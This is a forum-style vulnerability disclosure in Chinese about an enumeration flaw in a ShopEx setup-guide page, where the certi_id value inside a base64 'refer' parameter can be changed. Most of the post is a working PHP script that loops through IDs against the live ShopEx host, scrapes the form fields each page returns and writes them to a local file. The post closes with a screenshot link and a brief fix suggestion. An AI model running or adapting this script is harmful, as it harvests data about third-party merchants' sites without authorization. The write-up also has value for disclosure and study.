ShopEx某接口缺陷可遍历所有用户网站
简要描述:ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step2.php?refer=eyJjZXJ0aV9pZCI6MTA1MSwiY2FsbGJhY2tfdXJsIjoiaHR0cDpcL1wvd3d3LmVrYWlkaWFuLmNvbVwvIn0=
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php
for ($i=1; $i < 10000; $i++) { //遍历
ShowshopExD($i);
}
function ShowshopExD($cid) {
$url='http://guide.ecos.shopex.cn/step2.php';
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
$url = $url.'?refer='.$refer;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
$result = curl_exec($ch);
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
if(strpos($result,$refer))
{
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
foreach ($value as $key) {
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
echo $res.':'.$res."\r\n";
$col =$res.':'.$res."\r\n";
fwrite($fp, $col, strlen($col));
}
echo '--------------------------------'."\r\n";
fclose($fp);
}
flush();
curl_close($ch);
}
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
页:
[1]